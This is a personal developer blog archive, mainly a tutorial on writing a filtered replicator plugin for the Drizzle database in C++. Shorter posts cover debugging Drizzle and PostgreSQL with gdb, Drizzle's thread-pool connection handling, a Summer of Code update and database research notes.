More information on the 3 files related to plugins is available on the plugin build system page on the Drizzle wiki. Since the replicator plugin does not depend on any external library, we don't need to worry about the other 2 plugin build files here.

Now, since we are developing a replicator, we need to be aware of the replicator API provided by Drizzle's core kernel. That API is defined in the drizzled/plugin/replicator.h include file. If we look in that file, we find the following class definition:

/**
 * Class which replicates Command messages
 */
class Replicator
{
public:
  Replicator() {}
  virtual ~Replicator() {}
  /**
   * Replicate a Command message to an Applier.
   *
   * @note
   *
   * It is important to note that memory allocation for the
   * supplied pointer is not guaranteed after the completion
   * of this function -- meaning the caller can dispose of the
   * supplied message.  Therefore, replicators and appliers
   * implementing an asynchronous replication system must copy
   * the supplied message to their own controlled memory storage
   * area.
   *
   * @param Command message to be replicated
   */
  virtual void replicate(Applier *in_applier,
                         drizzled::message::Command *to_replicate)= 0;

  /**
   * A replicator plugin should override this with its
   * internal method for determining if it is active or not.
   */
  virtual bool isActive() {return false;}
};

The above was developed by Jay and thanks to his awesome work (with really helpful comments), it's pretty easy for us to determine what our replicator plugin needs to do. Basically, all we need to do is inherit from the Replicator class and implement the replicate() and isActive() methods and we have a simple replicator! Thus, we will have the following class:

class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();
};

Now, for the moment we want to filter by schema name or table name. Thus, we need a place to store the list of schema and table names to filter. Since this is Drizzle and Drizzle is all about using the STL, we'll go with a std::vector for each of these lists. We are going to assume that the schema and table names to filter by are each specified as a comma-separated list, so we will need a method to parse a comma-separated list and populate the appropriate vector. Finally, we will also need methods for determining whether a table name or schema name should be filtered or not. Based on all this, our class definition will now look like:

class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();

  /**
   * Populate the vector of schemas to filter from the
   * comma-separated list of schemas given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setSchemaFilter(const std::string &input);

  /**
   * Populate the vector of tables to filter from the
   * comma-separated list of tables given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setTableFilter(const std::string &input);

private:

  /**
   * Given a comma-separated string, parse that string to obtain
   * each entry and add each entry to the supplied vector.
   *
   * @param[in] input a comma-separated string of entries
   * @param[out] filter a std::vector to be populated with the entries
   *                    from the input string
   */
  void populateFilter(const char *input,
                      std::vector<std::string> &filter);

  /**
   * Search the vector of schemas to filter to determine whether
   * the given schema should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] schema_name name of schema to search for
   * @return true if the given schema should be filtered; false otherwise
   */
  bool isSchemaFiltered(const std::string &schema_name);

  /**
   * Search the vector of tables to filter to determine whether
   * the given table should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] table_name name of table to search for
   * @return true if the given table should be filtered; false otherwise
   */
  bool isTableFiltered(const std::string &table_name);

  std::vector<std::string> schemas_to_filter;
  std::vector<std::string> tables_to_filter;
};
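The class above declares populateFilter() without showing its body. As a minimal sketch of the comma-separated parsing it describes, the following uses free functions named populate_filter() and set_filter(); both names, the use of std::istringstream, and the trimming of spaces are assumptions made for illustration and are not taken from the plugin source.

```cpp
#include <sstream>
#include <string>
#include <vector>

// Hypothetical free-function version of populateFilter(): split a
// comma-separated string and append each non-empty entry to `filter`.
void populate_filter(const std::string &input,
                     std::vector<std::string> &filter)
{
  std::istringstream stream(input);
  std::string entry;
  while (std::getline(stream, entry, ','))
  {
    // Trim surrounding spaces so "one, two" behaves like "one,two".
    const std::string::size_type first= entry.find_first_not_of(' ');
    if (first == std::string::npos)
    {
      continue; // skip empty or all-space entries
    }
    const std::string::size_type last= entry.find_last_not_of(' ');
    filter.push_back(entry.substr(first, last - first + 1));
  }
}

// Mirrors the documented behaviour of setSchemaFilter() and
// setTableFilter(): clear the vector first, then repopulate it.
void set_filter(const std::string &input, std::vector<std::string> &filter)
{
  filter.clear();
  populate_filter(input, filter);
}
```

Calling set_filter("one, two", schemas) would leave the vector holding the two entries "one" and "two"; skipping empty entries is a design choice of this sketch, so a stray trailing comma does not produce an empty schema name.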

Now that we have the API for our replicator plugin decided on, let's implement the replicate() function. This will perform the filtering of events. For this plugin, it looks pretty simple (which is a good thing!):

void FilteredReplicator::replicate(drizzled::plugin::Applier *in_applier,
                                   drizzled::message::Command *to_replicate)
{
  /*
   * We first check if this event should be filtered or not...
   */
  if (isSchemaFiltered(to_replicate->schema()) ||
      isTableFiltered(to_replicate->table()))
  {
    return;
  }

  /*
   * We can now simply call the applier's apply() method, passing
   * along the supplied command.
   */
  in_applier->apply(to_replicate);
}

Our method for checking whether a schema should be filtered or not simply uses the STL. For completeness, that method looks as follows:

bool FilteredReplicator::isSchemaFiltered(const string &schema_name)
{
  vector<string>::iterator it= find(schemas_to_filter.begin(),
                                    schemas_to_filter.end(),
                                    schema_name);
  if (it != schemas_to_filter.end())
  {
    return true;
  }
  return false;
}
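To see the filtering behaviour without building Drizzle, here is a small stand-alone sketch. Command, Applier, RecordingApplier and SketchReplicator are hypothetical stand-ins written for this example; they only imitate the shape of drizzled::message::Command and drizzled::plugin::Applier as used above and are not the real classes.

```cpp
#include <algorithm>
#include <string>
#include <vector>

// Hypothetical stand-in for drizzled::message::Command.
struct Command
{
  std::string schema_name;
  std::string table_name;
  const std::string &schema() const { return schema_name; }
  const std::string &table() const { return table_name; }
};

// Hypothetical stand-in for drizzled::plugin::Applier.
struct Applier
{
  virtual ~Applier() {}
  virtual void apply(Command *to_apply)= 0;
};

// Records the table of every command that got past the replicator.
struct RecordingApplier: public Applier
{
  std::vector<std::string> applied_tables;
  void apply(Command *to_apply)
  {
    applied_tables.push_back(to_apply->table());
  }
};

class SketchReplicator
{
public:
  std::vector<std::string> schemas_to_filter;
  std::vector<std::string> tables_to_filter;

  void replicate(Applier *in_applier, Command *to_replicate)
  {
    if (contains(schemas_to_filter, to_replicate->schema()) ||
        contains(tables_to_filter, to_replicate->table()))
    {
      return; // filtered: the applier never sees this command
    }
    in_applier->apply(to_replicate);
  }

private:
  // Same linear std::find search as isSchemaFiltered() above.
  static bool contains(const std::vector<std::string> &names,
                       const std::string &name)
  {
    return std::find(names.begin(), names.end(), name) != names.end();
  }
};
```

With "one" in schemas_to_filter, a command for schema "one" is dropped while a command for schema "three" reaches the applier. A linear search is fine for a handful of names; a std::set would be an alternative if the lists grew large.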

There is not much more to it than that! As you can see, developing a replicator plugin does not have to be very difficult. Thanks to Jay's awesome work, it is actually fun! I am really enjoying working on my memcached applier at the moment (so much so that I probably spend too much time thinking about it when I should be working on other things...)
System Variables in a Plugin

The handling of system variables in a Drizzle plugin is not very pretty at the moment. Thankfully, Monty is working on refactoring system variables in Drizzle. You can read more about that work on the wiki page Monty created. However, for now, we are stuck with the old system. I'm going to describe what I needed to do for one system variable that specifies which schemas we should filter when filtering replication events. The system variable declaration looks as follows:

static DRIZZLE_SYSVAR_STR(filteredschemas,
                          sysvar_filtered_replicator_sch_filters,
                          PLUGIN_VAR_OPCMDARG,
                          N_("List of schemas to filter"),
                          check_filtered_schemas, /* check func */
                          set_filtered_schemas, /* update func */
                          NULL /* default */);

You can see that we specified 2 callback functions: check_filtered_schemas() and set_filtered_schemas(). These are both called when a SET command is executed on this system variable. The check_filtered_schemas() function can be used to make sure that the input is well-formed (I don't really check for that at the moment). For the moment, the check_filtered_schemas() function just copies the input string to a temporary string. Here is the code for that function (the temporary string and mutex are declared as global variables):

static int check_filtered_schemas(Session *,
                                  struct st_mysql_sys_var *,
                                  void *,
                                  struct st_mysql_value *value)
{
  char buff[STRING_BUFFER_USUAL_SIZE];
  int len= sizeof(buff);
  const char *input= value->val_str(value, buff, &len);

  if (input && filtered_replicator)
  {
    pthread_mutex_init(&sysvar_sch_lock, NULL);
    pthread_mutex_lock(&sysvar_sch_lock);
    tmp_sch_filter_string= new(std::nothrow) string(input);
    if (tmp_sch_filter_string == NULL)
    {
      pthread_mutex_unlock(&sysvar_sch_lock);
      pthread_mutex_destroy(&sysvar_sch_lock);
      return 1;
    }
    return 0;
  }
  return 1;
}

Next, we need a function to actually update the system variable. This function looks like so:

static void set_filtered_schemas(Session *,
                                 struct st_mysql_sys_var *,
                                 void *var_ptr,
                                 const void *save)
{
  if (filtered_replicator)
  {
    if (*(bool *)save != true)
    {
      filtered_replicator->setSchemaFilter(*tmp_sch_filter_string);
      /* update the value of the system variable */
      *(const char **) var_ptr= tmp_sch_filter_string->c_str();
      /* we don't need this temporary string anymore */
      delete tmp_sch_filter_string;
      pthread_mutex_unlock(&sysvar_sch_lock);
      pthread_mutex_destroy(&sysvar_sch_lock);
    }
  }
}
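The check/update split can be hard to follow when it is spread across globals and callbacks. The following is a minimal sketch of the same two-phase idea in isolation. StagedStringVar and its methods are hypothetical names, the code uses C++11 std::mutex rather than the pthread calls above, and it locks each phase separately instead of holding one lock from check to update, so it is not a drop-in replacement for the plugin code.

```cpp
#include <mutex>
#include <string>

// Hypothetical holder for one string system variable. None of these
// names come from Drizzle; they only illustrate the check/update split.
class StagedStringVar
{
public:
  // Phase 1 ("check func"): validate the input and stage a copy.
  // Returns 0 on success and 1 on rejection, like the callbacks above.
  int check(const char *input)
  {
    if (input == nullptr)
    {
      return 1;
    }
    std::lock_guard<std::mutex> guard(lock_);
    staged_= input;
    has_staged_= true;
    return 0;
  }

  // Phase 2 ("update func"): publish the staged value.
  // Returns false when there is nothing staged to publish.
  bool update()
  {
    std::lock_guard<std::mutex> guard(lock_);
    if (!has_staged_)
    {
      return false;
    }
    current_.swap(staged_);
    staged_.clear();
    has_staged_= false;
    return true;
  }

  // Returns a copy, so callers never hold a pointer into our storage.
  std::string value() const
  {
    std::lock_guard<std::mutex> guard(lock_);
    return current_;
  }

private:
  mutable std::mutex lock_;
  std::string staged_;
  std::string current_;
  bool has_staged_= false;
};
```

The published value lives in a member of the holder, so it stays valid after the staged copy is discarded. A caller would invoke check() with the user's input and, only if that returns 0, call update().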

You can see that having system variables in a plugin that can be updated is a little bit tricky right now in Drizzle. I wouldn't spend too much time worrying about this at the moment though. Like I said, once Monty finishes his system variable refactoring, we won't have to write such ugly and hard to understand code again. I am definitely looking forward to using the refactored system variables in Drizzle!
Using the Plugin

My branch with the filtered replicator plugin I developed is available on Launchpad. You can build it by pulling the branch from Launchpad:

$ cd dir/to/place/branch
$ bzr branch lp:~posulliv/drizzle/filtered-replicator
$ cd filtered-replicator
$ ./config/autorun.sh && ./configure && make

After compiling the branch, we can start playing with it. First thing we need to do is to start Drizzle. That can be accomplished easily:

$ cd /dir/with/replicator/branch
$ mkdir run
$ cd run
$ ../drizzled/drizzled --no-defaults --port=9306 \
--basedir=$PWD --datadir=$PWD \
--filtered-replicator-enable --filtered-replicator-filteredschemas='first,second' \
>> $PWD/drizzle.err 2>&1 &

The above command will start drizzled along with the filtered replicator. One of the system variables associated with this replicator is which schemas to filter replication events by. It is possible to specify these when starting the server (as well as tables to filter replication events by). You will notice that we have not enabled any applier of replication events. What does this mean? Well, it means that nothing is being done with the events that are happening! Sure, I have a replicator running that filters events based on what I specify but nothing is done with these events! I'm currently working on a Memcached applier that takes events and pushes them to a Memcached server to maintain a proactive cache but that is the topic of another blog post.
Now that we have the server up and running, let's see what system variables there are related to our replicator plugin (below, we are assuming the server is still running):

$ cd /dir/with/replicator/branch
$ cd run
$ ../client/drizzle --port=9306
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 2
Server version: 2009.07.1067 Source distribution (filtered-replicator)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle> show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | first,second |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle>

Let's modify the schemas we are filtering replication by (after showing the actual code that performs this, we might as well do it!):

drizzle> set global filtered_replicator_filteredschemas = 'third,fourth';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | third,fourth |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle>

Conclusion

This plugin is still under development and I'd love any input from people. What I'd really like to know is what kind of filters people would like to be able to specify. How flexible would people want a filtered replicator to be? Right now, it's only possible to filter by schema or table name but I could easily add more options if I thought they would be useful to people.

Summer of Code Progress

2009-07-14T00:00:00-07:00

Since we are around the half-way point in Google's Summer of Code, I thought I'd post a quick update on how things are going so far.
Right now, INFORMATION_SCHEMA is nearly a full plugin in Drizzle. The final patch which finishes the extraction of I_S into a plugin has been proposed for merging and I'm still waiting for that to get pushed to trunk. Once that happens, I will be able to get started on modifying the implementation of the various I_S tables. All in all, it's going pretty well. It's extremely satisfying to have patches accepted and placed straight into the codebase of the project that you are working on. I believe this is due to the fact that I am extremely lucky to be working on a project such as Drizzle with an awesome community. Unfortunately, I know that some SoC projects never get utilized, which seems like a bit of a waste to me.
To keep myself busy while waiting for patches to get merged, I decided to port the memcached UDFs to Drizzle. This has pretty much been completed save for a few UDFs that still need to be ported over. I added a test suite for the plugin tonight and am hoping to get it merged in the next week or two. A project that I'm just getting started with is creating a replication plugin for Drizzle that would send events to a memcached server. I'm hoping to get a simple prototype working in the next week or so and will then look for feedback from the community on it.
I've been pretty busy this summer and so have not had much time for posting. I would like to say that will improve in the future but it's unlikely!

Debugging Drizzle with GDB

2009-05-21T00:00:00-07:00

While working with Drizzle this week for my GSoC project, I've been going through the source code to understand how INFORMATION_SCHEMA is currently implemented. Reading through the source code is obviously the best way to understand the logic behind the current I_S implementation but using a debugger to step through the execution of this code can be extremely helpful in speeding up this process. Toru previously published a related post on debugging Drizzle with gdb which may also be useful.
As Toru mentioned in his post, attaching gdb to Drizzle can be quite simple:

The above commands will open an xterm window with a gdb session started that is attached to the Drizzle server process. While this works fine, sometimes I am working on a remote machine and don't want to go to the hassle of setting up something like X11 forwarding or VNC to attach gdb to the server process. Also, while going through the I_S related code, I wanted to step through the code which runs on server startup, i.e. the things which happen before the xterm window with gdb opens as outlined above.
Thus, I wrote the following simple script that I use to debug Drizzle with gdb.

This script takes as an argument the path to the root of a Drizzle build directory. It then simply checks to see if Drizzle is running already or not. If it is already running, it will attach gdb to the Drizzle process in the current terminal window, for example:

If Drizzle is not already running, the script starts gdb so we can then kick Drizzle off ourselves within gdb and debug the server startup, for example:

That's about all I have for this post. As you can see, attaching gdb to Drizzle is a pretty straightforward process. I like to use my script mainly on remote servers but I also find it useful when I want to debug server startup on my local box too.

Attaching gdb To PostgreSQL

2009-05-03T00:00:00-07:00

This semester I've been doing a project with PostgreSQL and I needed to attach a debugger to PostgreSQL on numerous occasions to see what was going on. Since I didn't find much documentation on how to accomplish this, I thought I'd document it here for myself so I can refer to it in the future.
First off, since we want to attach a debugger to a program, we should make sure that program is compiled with debugging information. With Postgres, we can easily do that by passing it as an option to the configure script in the top level of the Postgres source code. Thus, I run configure as follows:

Now we can just build the source and install as per usual. Enabling asserts was a good idea for me in my situation as it turns on many sanity checks which were useful for my purposes. Next, we start up the Postgres server and create a database if necessary. Once that is done, clients can connect to the database. So I go ahead and start a session using the psql command line utility and connect to my newly created database.
Once a client was connected, I was able to run the following script in another terminal to find and attach to the Postgres process that was serving my session (this script is very much based on something that Tom Lane posted to the pgsql-hackers mailing list some time ago):

If no session is currently connected to Postgres, this script does nothing and silently exits. However, if a session is open, then gdb will attach to the Postgres server process serving that session. Here is an example output from when I ran it:

I ran a query in another terminal which triggered the breakpoint that I set in my debugger. The script I have provided does not work very elegantly if there are multiple clients connected to Postgres. It just lists out the process IDs of the various clients. For example, if 2 clients are connected to Postgres, we would get:

We could then manually use gdb to attach to the process that we are interested in. We can find out which process we want to connect to from within our client's session like so:

Now we see that this session corresponds to process 16588. We can simply attach gdb to this process as is done in the above shell script.
During the semester, this script worked fine for me as I never had to worry about multiple clients being connected at the same time. I was only ever dealing with 1 client connected to the server at a time so the above script served my purposes perfectly.
Note that the above process won't work if you want to debug part of the backend startup sequence. If you are interested in doing this, a very brief explanation is given on the PostgreSQL developers FAQ. I have not tried this and don't know how reliable or easy this is to do.

Google Summer of Code

2009-04-21T00:00:00-07:00

Yesterday, I found out that my proposal for Google's Summer of Code was accepted. This means I'll be getting paid to work full-time on Drizzle during the summer! I'll write a longer post on my actual project soon and I'll be updating this blog much more regularly during the summer with updates on my project.
This week I'm at the MySQL user's conference in Santa Clara where there are lots of interesting talks.

MySQL User Conference

2009-04-14T00:00:00-07:00

This year, I'm lucky enough to be going to the MySQL User Conference in Santa Clara. I've decided on the tutorials I'll be attending:

I know a bit about Memcached (such as when it might be useful) but have never used it in practice as I've never had the opportunity so I'm looking forward to learning a bit more about Memcached. The second tutorial should also be pretty interesting and I'm looking forward to hearing some interesting scaling techniques which I might not have known about before.
As for the sessions during the remainder of the week, I know I'll be attending all the ones being put on by various Drizzle developers, such as Brian's session on Drizzle, Stewart's session on memory management in MySQL/Drizzle, Eric's session on libdrizzle, and Monty's session on SQL called 'SQL is dead' (I'm pretty interested to hear what Monty has to say for that session!). I'm also planning on attending a few Ruby/Rails related sessions; I'm very interested in a session on ActiveRecord. There are a few sessions going on at the same time that I'm in two minds about at the moment. I'm thinking that I'll just make my mind up on the day about which one I will attend.
Of all the keynote speakers, the one I am most looking forward to hearing is Andy Bechtolsheim. Also, I'll be at the Drizzle developer day on the Friday at Sun and am looking forward to meeting all of the Drizzle team.

Connection Handling in Drizzle

2009-03-07T00:00:00-08:00

A few weeks ago I was reading the paper Anatomy of a Database System by Hellerstein and Stonebraker. Chapter 2 of that paper discusses process models in database systems. After reading that paper, I was interested in seeing what Drizzle does in this regard so I began looking at the source code to see. Essentially, Drizzle uses the thread per DBMS worker model that is outlined in the paper where a single multi-threaded process hosts all the DBMS worker activity. Drizzle also has the concept of a pool of threads where workers are multiplexed over a thread pool. The really nice thing about Drizzle in this regard is that the code for implementing the pool of threads is a plugin so if anyone is interested in writing their own thread scheduler, they can simply write a plugin for it. While developing an efficient scheduler might be a challenge, the mechanism for writing a plugin is pretty easy. I think that's pretty cool.
Let's discuss how a client connection is made to Drizzle and a query is executed. I'll provide a general overview first and then delve into more details. When the Drizzle server is started, a pool of threads is created. The initial MySQL worklog for the implementation of the thread pool mechanism can be found here. The number of threads in this pool can be specified by an administrator. The pthreads API is used for the creation of threads in Drizzle. The thread pool code also utilizes the libevent API which provides a mechanism to execute a callback function when a specific event occurs on a file descriptor. During the initialization of the thread pool, 2 callback functions are registered with libevent. These callback functions are to be executed whenever a session is added or killed. Each thread created during the thread pool initialization process has a thread body which waits for a session to process using libevent. When a new connection comes in, the thread pool code adds it to a queue for libevent processing. When a libevent callback function is invoked (more information about how and when this happens below), a session is removed from the queue and placed in one of two lists depending on the current state of the session: if the session is waiting for I/O it will be added to a list indicating that; otherwise, if it is ready for processing, it will be added to a list indicating this. The body of each thread created during the thread pool initialization is continuously running a loop which looks at the list of sessions that need processing. Whenever a session is added to that list, a thread will pop it from the list and process it. This thread will then go ahead and actually execute the command which the session wants to execute.
Now, let's delve just a little bit further into how client connections are made based on the short summary given in the previous paragraph. I'll reference relevant files and methods in the Drizzle Doxygen docs as I go along when possible. The first thing we'll look at is the main() method of the server which is executed when the server starts. This method is contained in drizzled.cc. After initializing various things, the handle_connections_sockets() method is called. This method is also in the drizzled.cc file and its purpose is to handle new connections and spawn new threads to handle them. This method contains a while loop which continuously executes during the lifetime of the server waiting for new connections to come in to the server. Within this loop, a poll() system call is performed. The poll() system call waits for an event on a file descriptor to occur. In this case, the event will be a new connection. When a new connection comes in, accept() is called to accept a connection on a socket and create a new connected socket. In the drizzled.cc file, this new socket is called new_sock (funnily enough!). Once error checking on the new socket is complete, a new Session object is allocated. If this allocation fails, then the server has reached a limit on the number of sessions that can occur. If no error occurs then the new Session object is passed as a parameter to the create_new_thread() method (also in the drizzled.cc file).
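The poll() wait described above can be tried in isolation. This is a minimal sketch, not code from drizzled.cc: wait_readable() is a hypothetical helper, and in a quick experiment a pipe can stand in for the listening socket so that no network setup is needed. It does not retry when poll() is interrupted by a signal, which a real server loop would need to handle.

```cpp
#include <poll.h>
#include <unistd.h>

// Hypothetical helper: wait up to timeout_ms milliseconds for `fd` to
// become readable. Returns true only if poll() reported POLLIN on it.
bool wait_readable(int fd, int timeout_ms)
{
  struct pollfd pfd;
  pfd.fd= fd;
  pfd.events= POLLIN;
  pfd.revents= 0;

  // poll() returns the number of descriptors with events, 0 on
  // timeout, or -1 on error (including interruption by a signal).
  const int ready= poll(&pfd, 1, timeout_ms);
  return ready > 0 && (pfd.revents & POLLIN) != 0;
}
```

For a listening socket, POLLIN means a connection is waiting and accept() will not block. With a pipe, the read end becomes readable as soon as a byte is written to the write end.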
The create_new_thread() method creates a new thread to handle the incoming connection. It is in this method that control actually enters the thread pool code. This occurs when the thread_scheduler.add_connection() method is called. thread_scheduler is a struct of type scheduling_st that defines the interface to the scheduler plugin. When add_connection() is called on the thread_scheduler struct it calls the add_connection() function in whichever scheduler plugin is currently loaded. Since we are talking about the thread pool plugin, it will call the add_connection() function in the pool_of_threads.cc file. The add_connection() method notifies the thread pool about a new connection. A new session_scheduler object is created for that new connection. The session_scheduler class is defined in the session_scheduler.h file. This scheduler is set as the scheduler for the Session object that was passed as a parameter to the create_new_thread() method. Next, the libevent_session_add() method is called with the Session object passed as a parameter.
The libevent_session_add() method adds the Session object to a queue for libevent processing. It signals libevent by writing a byte into the session_add pipe which will trigger the callback function libevent_add_session_callback(). This callback function pops the first Session object off the queue of objects waiting for libevent processing and adds the Session object to one of two lists: 1) sessions_need_processing or 2) sessions_waiting_for_io. Which list the Session object is added to depends on the current state of the session. Once the libevent_add_session_callback() function completes, the adding of a new connection to the pool of threads is essentially complete. A session is chosen to be executed within the body of a thread running in the pool of threads. Each thread in the pool of threads is running with an outer loop that is defined in the libevent_thread_proc() method. Essentially, each thread in the pool of threads is running an infinite loop that examines the sessions_need_processing list. When the sessions_need_processing list becomes non-empty, a thread will pop the first Session object from that list and actually go ahead and process a query in that session.
The above description is not meant to be exhaustive. Actually reading through the pool of threads code is not that difficult and a grasp of what the code is doing can be easily obtained in a short period of time. I mostly wrote this for my own purposes so I had a better understanding of how it works.
While the thread pool code works well, it is not without issues. Mark Callaghan points out that when using the thread pool model in MySQL, every command sent to the server requires a pthread mutex lock/unlock pair on LOCK_event_loop. He has also logged a bug for this. Brian Aker responded to Mark's comments by saying that to get rid of this lock, you essentially need to write your own solution. This is much easier to attempt with Drizzle due to its plugin architecture that I mentioned at the beginning of this post. As he says "We have abstracted out this problem now so you can focus on solving this problem if you want". I believe that the idea is that people can write/tune thread schedulers for their own workload since a generic scheduler will not work well for every workload. With this approach, people can easily write a scheduler which is uniquely suited to their workload.
When it comes to the thread pool code, Brian also points out that the current design does not use libevent in the most optimal manner. He says "When it comes to pool of threads I think the current design misses the point of using libevent. Currently it does not yield on IO block, so in essence all it is doing it keeping you from overwhelming the operating system's scheduler and providing a completion for a given action. For small queries this is fine, but for longer running queries this is not very good (though... most queries we see are pretty short so this part is not a huge concern). It needs to be redesigned to make better use of IO, and this is something we will work on soon". It's interesting to look at memcached as an example of how another multi-threaded application uses libevent. Steven Grimm gives a brief outline in this thread of how he implemented thread support in memcached. I know Brian is currently working on a multi-threaded scheduler for Drizzle which is almost complete. He has mentioned in the past that there is a need to design a scheduler which really understands the difference between high/low and time constrained queries. I believe this is an interesting issue to think about.
In future posts, I hope to investigate the thread pool code more. In particular, I'd like to see how libevent could be used in a more optimal way and talk about some of the design considerations for a cost-based scheduler. Also, if I have time, I hope to write about how a query is processed in Drizzle i.e. what happens after connection handling.

Semester Project

2009-02-20T00:00:00-08:00

This semester I’m taking a course in database management systems. For this course, we have to work on a mini-research project in groups. I’m in a group with 2 other students and the project we decided on was to perform an experimental evaluation of the mJoin operator. This will involve surveying the prior work on the mJoin operator and performing an implementation of the operator in an open-source DBMS.

The mJoin operator is essentially an n-ary symmetric hash join operator. For each relation to be joined, a hash table is built on each join attribute. Then for each new tuple, it is inserted into the appropriate hash table(s) and a probe is performed into the hash tables on the other relations. Intermediate tuples are never stored anywhere. One of the issues we will be investigating in this experimental evaluation is whether an operator like the mJoin is more or less efficient than a tree of binary joins. Conventional wisdom says that a tree of binary joins is typically more efficient.
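To make the insert-then-probe behaviour concrete, here is a minimal sketch of an n-ary symmetric hash join. It is an illustration only and not the implementation we will build: SymmetricHashJoin, Tuple and JoinedRow are hypothetical names, and the sketch assumes all relations join on a single shared integer key, whereas the operator described above keeps a hash table per join attribute.

```cpp
#include <cstddef>
#include <string>
#include <unordered_map>
#include <vector>

// A tuple reduced to its join key plus an opaque payload.
struct Tuple
{
  int key;
  std::string payload;
};

// One result row: one payload per input relation, in relation order.
typedef std::vector<std::string> JoinedRow;

class SymmetricHashJoin
{
public:
  explicit SymmetricHashJoin(std::size_t relation_count)
    : tables_(relation_count) {}

  // Insert `tuple` into the hash table of relation `source`, then probe
  // the hash tables of every other relation. Returns the result rows
  // that this arrival completes (possibly none).
  std::vector<JoinedRow> insert(std::size_t source, const Tuple &tuple)
  {
    tables_.at(source)[tuple.key].push_back(tuple.payload);

    // Partial rows exist only for the duration of this call; nothing
    // intermediate is kept between arrivals.
    std::vector<JoinedRow> results(1, JoinedRow(tables_.size()));
    results[0][source]= tuple.payload;

    for (std::size_t rel= 0; rel < tables_.size(); ++rel)
    {
      if (rel == source)
      {
        continue;
      }
      auto match= tables_[rel].find(tuple.key);
      if (match == tables_[rel].end())
      {
        return std::vector<JoinedRow>(); // no partner in this relation yet
      }
      // Extend every partial row with every matching tuple.
      std::vector<JoinedRow> extended;
      for (const JoinedRow &partial : results)
      {
        for (const std::string &payload : match->second)
        {
          JoinedRow row= partial;
          row[rel]= payload;
          extended.push_back(row);
        }
      }
      results.swap(extended);
    }
    return results;
  }

private:
  // One hash table per relation: join key -> payloads seen so far.
  std::vector<std::unordered_map<int, std::vector<std::string> > > tables_;
};
```

With three relations, inserting a tuple with key 1 into the first two produces no output; the first tuple with key 1 to arrive on the third relation emits the joined row immediately. Output therefore appears as soon as the last matching input arrives, regardless of arrival order.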

The first thing we will be doing in the next week or two is looking at various open-source databases and seeing which one would be most suited for us to work with for this project. Basically, the main criteria will be how easy the runtime engine is to work with and how easy it will be to add a new operator. We’ll have a look at a lot of databases but at the moment, it’s looking like PostgreSQL is the one we will work with for the semester. We’ll also be looking into any related work. The survey on adaptive query processing looks like a good starting point for this.

Some other interesting aspects of the mJoin operator which we hope to investigate are:

query optimization with the mJoin operator
what applications would benefit from an operator such as this
what kind of scenarios is the operator suited for (and not suited for)
how difficult it is to add the operator to an existing DBMS

I’ll try to post regularly throughout the semester on what we are up to and provide updates on what kind of progress we are making. In the meantime, besides working on this project, I’m trying to contribute to Drizzle in as many ways as I possibly can. I’m mostly working on small bugs and performing some code cleanup tasks.

Drizzle: A Pretty Cool Project

2009-01-28T00:00:00-08:00

Drizzle is a pretty cool project whose progress I've started following in the last few weeks. I'm trying to contribute in a tiny way if I can by confirming bug reports. If I had more time, I'd like to try resolving some bugs. Hopefully, I'll find some spare time to do that in the future.

I think it's definitely a project worth keeping an eye on though. Check it out if you have the time.

What is Direct Data Placement

2009-01-06T00:00:00-08:00

I’m currently studying Oracle’s white paper on Exadata and came across the following paragraph:

“Further, Oracle’s interconnect protocol uses direct data placement (DMA - direct memory access) to ensure very low CPU overhead by directly moving data from the wire to database buffers with no extra data copies being made.”

This got me wondering what direct data placement is. First off, the interconnect protocol which Oracle uses in Exadata is Reliable Datagram Sockets (RDSv3). The iDB (intelligent database protocol) that a database server and Exadata Storage Server software use to communicate is built on RDSv3.

Now, I found some information on direct data placement in a number of RFCs: RFC 4296, RFC 4297, and RFC 5041. Of the 3 RFCs, I found RFC 5041 (Direct Data Placement over Reliable Transports) to be the most relevant (although they are all worth a quick look). RFC 5041 sums up direct data placement quite nicely:

“Direct Data Placement Protocol (DDP) enables an Upper Layer Protocol (ULP) to send data to a Data Sink without requiring the Data Sink to Place the data in an intermediate buffer - thus, when the data arrives at the Data Sink, the network interface can place the data directly into the ULP’s buffer.”

The paragraph from Oracle’s white paper makes much more sense to me now after briefly reading through the RFC. Since each InfiniBand link in Exadata provides 16 Gb/s of bandwidth, there would be a large amount of overhead if data had to be placed in an intermediate buffer. Thus, the use of direct data placement makes perfect sense since it reduces the CPU overhead associated with copying data through intermediate buffers.

Also, I believe that in the paragraph quoted from Oracle’s white paper, the abbreviation should be RDMA (Remote Direct Memory Access) rather than DMA.

Semester Project Finally Finished

2008-12-16T00:00:00-08:00

We just finished our semester project yesterday for the class I am taking on High Performance Computing. It was a pretty interesting project based on the topic of software fault injection.

More details can be found in the project report here.

Configuring Oracle as a Service in SMF

2008-11-30T00:00:00-08:00

In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is a component of the so-called Predictive Self Healing technology available in Solaris 10. The other component is the Fault Management Architecture.

